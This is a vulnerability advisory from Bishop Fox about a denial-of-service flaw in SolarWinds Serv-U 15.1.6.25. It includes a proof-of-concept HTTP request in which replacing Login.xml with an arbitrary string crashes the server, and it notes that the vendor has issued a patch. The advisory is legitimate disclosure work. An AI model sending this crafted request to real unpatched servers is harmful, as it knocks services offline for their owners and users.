January 8, 2018
SolarWinds
Serv-U 15.1.6.25
A denial-of-service vulnerability in SolarWinds Serv-U 15.1.6.25 allows an authenticated user to crash the application (with a NULL pointer dereference) via a specially crafted URL beginning with the /Web%20Client/ substring.
The vendor has been notified of this vulnerability, and has patched the software as of version 15.1.6 HFv1.
An authenticated user can request a specially crafted URL from the Serv-U MFT server that will result in a null pointer dereference. By changing the Login.xml string in the URL of an authentication request to an arbitrary value, an attacker can cause the application to crash. An ordinary login request is shown below:
POST /Web%20Client/Login.xml?Command=Login&Sync=1514397954014 HTTP/1.1
Host: 127.0.0.1
Connection: close
…omitted for brevity…
Cookie: multitransbubbletip=false; multitrans=0; SURememberMe=true; SUUserId=testuser2; killmenothing; SULang=en%2CUS
user=testuser&pword=password&viewshare=&language=en%2CUS&
In this proof of concept, Login.xml was replaced with the string crash, as pictured below:
POST /Web%20Client/crash?Command=Login&Sync=1514397954014 HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Length: 59
…omitted for brevity…
Cookie: multitransbubbletip=false; multitrans=0; SURememberMe=true; SUUserId=testuser2; killmenothing; SULang=en%2CUS
user=testuser&pword=password&viewshare=&language=en%2CUS&
The Serv-U tray immediately displayed a pop-up notification stating that the Serv-U MFT server was offline. Shortly thereafter, an error message was displayed within the Serv-U Management Console, as seen below:
FIGURE 1 - Error produced in Serv-U Management Console after sending the malicious payload
The Management Console was otherwise unresponsive, and the Serv-U MFT server had to be manually restarted following this crash.
Baker Hamilton, MD, MMSc of Bishop Fox